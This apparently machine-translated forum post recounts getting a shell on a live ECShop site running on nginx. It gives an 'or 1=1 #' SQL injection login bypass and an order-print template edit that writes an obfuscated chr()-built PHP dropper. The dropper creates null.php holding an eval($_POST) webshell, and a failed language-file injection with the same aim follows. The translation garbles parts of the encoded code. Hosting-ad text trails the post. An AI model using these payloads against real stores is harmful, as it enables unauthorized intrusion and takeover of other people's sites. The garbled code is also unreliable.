Title:linux system Ecshop Take the shell method--2011-06-08 13:23
Recently get a station, to ecshop take the shell not understand, led to go a lot of detours.
nginx/0.8.54 server, MAGIC_QUOTES_GPC Open escape, a lot of pages have been deleted.
Background has or vulnerability, the user "or 1=1 #" password to fill in.
I don't know at first, I know less.
The site's myship.php access is not available, but the Library project management template can be edited, unable to find the file path is not found, because the use of nginx/0.8.54, parsing vulnerability was patched.
Many methods of using the shell cannot be used, such as backing up X.PHP.SPL,FCK to create a x.asp class folder.
Started in the background for a long time, has not been the point of Flash Player management last PHP try, there is no thought to upload php files, no restrictions.
Back to the Internet to find other ways.
background-order Management-order printing-Choose Source Edit-Save
Return to the list of orders, arbitrarily choose an order to print, return OK, generate a sentence success!
The following is the edited code:
--------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------
<?
$filen =CHR (+). chr (CHR). CHR (117). chr (108). chr (108). chr ("CHR"). Chr (104). CHR (112);
$filec =CHR. chr (104). CHR (101). Chr (118). Chr (108). Chr (36). Chr (the ".") (+) (+) (+)). Chr () Chr. chr (117). Chr (the "CHR") Chr. Chr (98). Chr (the ". Chr"). Chr (the "()). chr (" CHR ") (() The ( 62);
$a =CHR (119);
[Email protected] ($filen, $a);
[Email protected] ($FP, $filec);
if ($msg) Echo chr (. chr). chr (33);
@fclose ($FP);
?>
--------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------
.. /null.php
<?php eval ($_post[usb]);? >
This is the path and password.
I have another idea that is, ' when single quotes are not escaped, the Admin center-language item editor edits the PHP page, closing the single quotation mark.
shopping_flow.php Edit
Input language Item Keyword: Activity list
List of activities ';? ><?php @eval ($_post[ok]);? ><? ' Ok
Save
Then visit
http://site/languages/zh_cn/shopping_flow.php
failed because ' escaped ' cannot close the single quotation mark behind the active list because it was tried.
Who has other methods that can be discussed together under.
Linux system Ecshop Get the Shell method
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
